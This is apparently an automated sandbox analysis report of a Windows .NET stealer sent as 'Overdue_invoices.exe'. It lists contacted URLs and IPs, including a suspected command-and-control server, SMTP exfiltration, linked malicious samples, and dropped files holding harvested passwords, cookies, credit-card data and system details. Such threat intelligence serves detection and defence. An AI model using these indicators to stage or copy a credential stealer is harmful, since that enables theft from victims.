                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://ocsp.pki.goog/gsr202Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://pki.goog/repository/0Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://raw.githubusercontent.com/pandalog/nothing/master/john.txtOverdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.msn.com/Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmpfalse
                              		high
                              http://www.msn.com/de-ch/?ocid=iehpOverdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625516000.0000000001562000.00000004.00000020.sdmpfalse
                                		high
                                https://ac.ecosia.org/autocomplete?q=Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drfalse
                                  		high
                                  https://raw.githubusercontent.comOverdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ocsp.pki.goog/gts1o1core0Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://wa.239.147.103/base/D87080E8818FCC40A45F948026A84297.htmlOverdue_invoices.exe, 00000000.00000002.230153111.0000000000B83000.00000004.00000020.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.msn.com/de-ch/Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.msn.com/?ocid=iehpOverdue_invoices.exe, 00000001.00000002.625659765.00000000015AD000.00000004.00000020.sdmp, Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmpfalse
                                      		high
                                      http://crl.pki.goog/GTS1O1core.crl0Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_SlOverdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmpfalse
                                        		high
                                        http://icanhazip.comOverdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmpfalse
                                          		high
                                          http://193.239.147.103Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crl.pki.goog/gsr2/gsr2.crl0?Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOverdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmpfalse
                                            		high
                                            http://smtp.gmail.comOverdue_invoices.exe, 00000001.00000002.626846042.000000000328B000.00000004.00000001.sdmpfalse
                                              		high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drfalse
                                                		high
                                                https://i.imgur.com/9sS1RPE.pngOverdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmpfalse
                                                  		high
                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drfalse
                                                    		high

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    193.239.147.103
                                                    		unknownBrunei Darussalam
                                                    		35913DEDIPATH-LLCUSfalse
                                                    147.75.47.199
                                                    		unknownSwitzerland
                                                    		54825PACKETUSfalse
                                                    151.101.0.133
                                                    		unknownUnited States
                                                    		54113FASTLYUSfalse
                                                    108.177.119.109
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Emerald
                                                    Analysis ID:344973
                                                    Start date:27.01.2021
                                                    Start time:15:14:11
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 8m 25s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:Overdue_invoices.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:28
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@3/6@4/4
                                                    EGA Information:Failed
                                                    HDC Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 95%
                                                    • Number of executed functions: 21
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 104.43.139.144, 40.88.32.150, 51.104.144.132, 23.210.248.85, 95.101.22.224, 95.101.22.216, 20.54.26.129, 95.101.27.163, 95.101.27.142, 51.103.5.186, 51.104.139.180, 52.155.217.156
                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/344973/sample/Overdue_invoices.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    15:15:12API Interceptor11x Sleep call for process: Overdue_invoices.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    193.239.147.103SIT-10295.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/759EFD3939882C342360C054C0B0F139.html
                                                    MT103_SWFT012621ONOMN.docGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/FF20D3DCE8649E687BDAC089AF53336F.html
                                                    RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/ED373B21DE74B174904C90C4F88850ED.html
                                                    SecuriteInfo.com.Trojan.DownLoader36.37393.25689.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/817B8D2BFEA38CDAF771C594C8EDD2E5.html
                                                    SecuriteInfo.com.Trojan.DownLoader36.37393.27958.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/D11F9AABDFF0704F9266CD718DBD402A.html
                                                    SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/D1A437E767757AD4AED3D462BF223DC7.html
                                                    Shipping Documents.docGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/3CC85C5A6F2A98A2641549BF1564DA9E.html
                                                    8Aobnx1VRi.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/3CC85C5A6F2A98A2641549BF1564DA9E.html
                                                    DSksIiT85D.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/84BABA4BCDFD79499D4EFDE97172FE7F.html
                                                    SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/4360BD50C79123B72BE98F9871724C8D.html
                                                    Updated Invoice{swift..exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/3815F0F23310F1653DD4231C92F53862.html
                                                    mr kesh.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/B690B5BB2DC34BEDA854B2E34C821BF0.html
                                                    SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/AC74DA1A537FAA26238A4038BDCC34AA.html
                                                    SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/A835403D21646D38831BEFB4AACEE40A.html
                                                    SecuriteInfo.com.BehavesLike.Win32.Generic.mh.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/CFA32E9D22202129AAEAB33745DD6268.html
                                                    SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/8C0599C1B9B3E6070FB750C30A6E4DE5.html
                                                    SecuriteInfo.com.Artemis326CF1417127.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/C153CE1CCAD2548C2547CF3FCE5D339E.html
                                                    Enq No 34 22-01-2021.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/8DE336D63584EEF9B2E4A84C87518330.html
                                                    DHL SHIPPING INVOICE DOCUMENTS.docGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/CFA32E9D22202129AAEAB33745DD6268.html
                                                    Walaa-Qasem-resume2.docGet hashmaliciousBrowse
                                                    • 193.239.147.103/base/C393873424A9CB9C6D7E741325C13725.html

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    github.map.fastly.netSIT-10295.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    QT21006189.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    client.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    testMalware3.ps1Get hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    purchase order TR2021011802.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    TNT Original Invoice PDF.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    Photo-064-2021.jpg.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    UT45.vbsGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    33f77d4d.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    RFQ_211844_PR20Q-6706.pdf.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    P.O.No.#17AUFR010S.pdf.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    PO#83922009122.pdf.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    AS006-20211201.pdf.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    2CBPOfVTs5QeG8Z.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    Payment.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    inrfzFzDHR.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    0IO1Or2045.exeGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    https://patrickphimr5.github.io/memoaideivozx/dsfriet.html?bbre=dxcfdgoissGet hashmaliciousBrowse
                                                    • 151.101.0.133
                                                    smtp.gmail.comSIT-10295.exeGet hashmaliciousBrowse
                                                    • 108.177.119.109
                                                    QT21006189.exeGet hashmaliciousBrowse
                                                    • 108.177.119.109
                                                    fusion.exeGet hashmaliciousBrowse
                                                    • 173.194.69.108
                                                    Revised Invoice.exeGet hashmaliciousBrowse
                                                    • 173.194.69.109
                                                    transcach.exeGet hashmaliciousBrowse
                                                    • 172.253.120.109
                                                    PCS.exeGet hashmaliciousBrowse
                                                    • 172.253.120.109
                                                    transcach.exeGet hashmaliciousBrowse
                                                    • 172.253.120.109
                                                    ORDER-02044.exeGet hashmaliciousBrowse
                                                    • 66.102.1.109
                                                    EA0Y2020 Outstanding invoice 20190510to 20201214.exeGet hashmaliciousBrowse
                                                    • 173.194.69.109
                                                    vygtHoQaI1KaBVp.exeGet hashmaliciousBrowse
                                                    • 173.194.69.108
                                                    QCXw2WXDjOalhVZ.exeGet hashmaliciousBrowse
                                                    • 108.177.119.109
                                                    yqd2LHZ8y57Bzy4.exeGet hashmaliciousBrowse
                                                    • 108.177.119.109
                                                    knitted yarn documents.exeGet hashmaliciousBrowse
                                                    • 172.253.120.109
                                                    a9bdc406f87d6072599939a86b766fa4.exeGet hashmaliciousBrowse
                                                    • 172.253.120.109
                                                    SecuriteInfo.com.Generic.mg.e1df690a980825ac.exeGet hashmaliciousBrowse
                                                    • 173.194.69.108
                                                    SecuriteInfo.com.BackDoor.SpyBotNET.17.12571.exeGet hashmaliciousBrowse
                                                    • 74.125.133.108
                                                    PCS.exeGet hashmaliciousBrowse
                                                    • 173.194.76.108
                                                    NQ6UdXpwwU.exeGet hashmaliciousBrowse
                                                    • 173.194.76.108
                                                    Money gram.exeGet hashmaliciousBrowse
                                                    • 173.194.69.109
                                                    Codes.exeGet hashmaliciousBrowse
                                                    • 172.253.120.108

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    DEDIPATH-LLCUSTender documents_FOB_Offer_Printout.PDF.exeGet hashmaliciousBrowse
                                                    • 45.15.143.189
                                                    SIT-10295.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    MT103_SWFT012621ONOMN.docGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    SecuriteInfo.com.Trojan.DownLoader36.37393.25689.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    SecuriteInfo.com.Trojan.DownLoader36.37393.27958.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    Shipping Documents.docGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    8Aobnx1VRi.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    DSksIiT85D.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    Updated Invoice{swift..exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    mr kesh.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    SecuriteInfo.com.BehavesLike.Win32.Generic.mh.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    SecuriteInfo.com.Artemis326CF1417127.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    Enq No 34 22-01-2021.exeGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    DHL SHIPPING INVOICE DOCUMENTS.docGet hashmaliciousBrowse
                                                    • 193.239.147.103
                                                    PACKETUSSIT-10295.exeGet hashmaliciousBrowse
                                                    • 147.75.47.199
                                                    QT21006189.exeGet hashmaliciousBrowse
                                                    • 136.144.56.255
                                                    oHqMFmPndx.exeGet hashmaliciousBrowse
                                                    • 185.244.121.205
                                                    SecuriteInfo.com.Trojan.PackedNET.509.17348.exeGet hashmaliciousBrowse
                                                    • 104.245.238.50
                                                    kinsing2Get hashmaliciousBrowse
                                                    • 147.75.47.199
                                                    kinsingGet hashmaliciousBrowse
                                                    • 147.75.47.199
                                                    inrfzFzDHR.exeGet hashmaliciousBrowse
                                                    • 136.144.56.255
                                                    http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                                    • 147.75.102.200
                                                    HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                                                    • 136.144.56.255
                                                    vPZHkecu7y.exeGet hashmaliciousBrowse
                                                    • 64.187.226.251
                                                    530ppafC4x.exeGet hashmaliciousBrowse
                                                    • 64.187.226.251
                                                    fBTeh5eM2o.exeGet hashmaliciousBrowse
                                                    • 64.187.226.251
                                                    OdkQY9bDfK.exeGet hashmaliciousBrowse
                                                    • 64.187.226.251
                                                    6DHaBgali4.exeGet hashmaliciousBrowse
                                                    • 64.187.226.251
                                                    SecuriteInfo.com.BehavesLike.Win32.Trojan.cc.exeGet hashmaliciousBrowse
                                                    • 64.187.226.251
                                                    SecuriteInfo.com.BehavesLike.Win32.Trojan.cc.exeGet hashmaliciousBrowse
                                                    • 64.187.226.251
                                                    invv.exeGet hashmaliciousBrowse
                                                    • 172.82.162.227
                                                    https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343Get hashmaliciousBrowse
                                                    • 147.75.102.200
                                                    DHL Shipping Document Tracking No Confirmation.exeGet hashmaliciousBrowse
                                                    • 147.75.47.199
                                                    QUOTATION REQUEST FOR PO 024-2020.pdf.exeGet hashmaliciousBrowse
                                                    • 147.75.47.199

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Overdue_invoices.exe.log
                                                    Process:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1039
                                                    Entropy (8bit):5.365622957937216
                                                    Encrypted:false
                                                    SSDEEP:24:MLU84qpE4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7GE4Ks:Mgv2HKXwYHKhQnoPtHoxHhAHKzvGHKs
                                                    MD5:8661DEF1A785B33817416A73C5B2C3DD
                                                    SHA1:3341588F1C06BFFDDCCCF2EDE4F62D6D5F7AACA9
                                                    SHA-256:BF8FD626E9B119BF1F5045CAB9B6A2A773FB44ADCCB303B807CF650CE50758DD
                                                    SHA-512:035155C37E203345617D0679BC0F544E492BA0FBCC8CD42DA91FA721011BAE29095DE36F5D54CC08FF31B70DBD0FEB3DA82DDC9DD36F2D37B7EFE822DA5FBACC
                                                    Malicious:true
                                                    Reputation:moderate, very likely benign file
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                    C:\Users\user\AppData\Local\Temp\TMP_4728
                                                    Process:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):50
                                                    Entropy (8bit):4.63572875064339
                                                    Encrypted:false
                                                    SSDEEP:3:Nm1WXp5vqTSVKty:01WXpFqTDk
                                                    MD5:B8D917424EC0E1B5CED53A0A590E0018
                                                    SHA1:E01F04CBE64F80F7B8FD594B720AD27C2B36B9CC
                                                    SHA-256:193D0458703DC296C08E19CDA97C5620AFB32953537FE8F0AF9B8316E75EBD53
                                                    SHA-512:B5AD66175D58D1C797102F53B8D110451AE2CA07E3AF23E11CB7A50A5CCBF335B375F7FE90EF818DB008472655544FCE85571868D5516B0264520475CE4B21BC
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: 6020,C:\Users\user\Desktop\Overdue_invoices.exe..
                                                    C:\Users\user\AppData\Local\Temp\TMP_Cookies
                                                    Process:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.6970840431455908
                                                    Encrypted:false
                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                    MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                    SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                    SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                    SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\TMP_pass
                                                    Process:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.792852251086831
                                                    Encrypted:false
                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\browserCreditCards
                                                    Process:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):73728
                                                    Entropy (8bit):1.1874185457069584
                                                    Encrypted:false
                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                    MD5:72A43D390E478BA9664F03951692D109
                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\tmp99EA0x.tmp
                                                    Process:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    File Type:UTF-8 Unicode text, with CRLF, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):2689
                                                    Entropy (8bit):5.347685360604738
                                                    Encrypted:false
                                                    SSDEEP:48:8bAIVIDAlG33HPrLPFpsPa1tPLpnPVTPUnP2PHydVWAgH8wAcxWClwBNxhXv2ilZ:85VIDLHzLNpsKtDpndT8nuPHydVWhcwU
                                                    MD5:A8307959CD38001AEC8D022D52094D23
                                                    SHA1:BDE6320753A11E17291CBF3153DC009E65B0E449
                                                    SHA-256:EDC211E8DD994F7F9AA7F947AF81504D32404711B84BCD180CDD216123B3043A
                                                    SHA-512:B006429E1E383ED11E2BF3DE2A8349D6EF8DAF0D699AF66E44032E83C61DDA793FC3D2B5D05102C544D935591B2FE9364FA69213F89C35496935F47AC2E59A76
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: ==========| Panda Logger - System Details |==========...Computer Name: 494126..Username: user..Country Name: United States..System date and time: 1/27/2021 3:15:12 PM..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Framework: 4.0.30319.42000..Operating System: Microsoft Windows 10 Pro..Process Elevated:True..IP address: 84.17.52.74.....===== Installed Programs/Softwares =====..[+] Google Chrome..[+] Microsoft Office Professional Plus 2016..[+] Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501..[+] Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005..[+] Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319..[+] Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702..[+] Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702..[+] Java 8 Update 211..[+] Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030..[+] Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702..[+] Java Auto Updater..[+] Google Update Helper..[+] Microsoft

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):5.607365895665976
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:Overdue_invoices.exe
                                                    File size:100864
                                                    MD5:afa35ee8f27c8a6661219bccb198fd9b
                                                    SHA1:8b86a3066a24586bd5d17ce45ce8bd7984079af0
                                                    SHA256:2d2c26b0f3308bda9e00913401761b8b5026edccfbe12bce7a72cd2d324c2f45
                                                    SHA512:6b2242cad79cf4aea483f6e56d25ca60a8fe5788ae298bd69ae0b150092ebb22a0d2c89d93d33733248a47d6b2077cd2b67d3163af124521a570157974af2419
                                                    SSDEEP:3072:YMVu0mNieZzQ5mPagIWSPahXjYktx0gxOytswL+f66fQG8zJGVT4qG9:YHZf
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W..`.........."...0..x............... ........@.. ..............................rf....`................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4197be
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
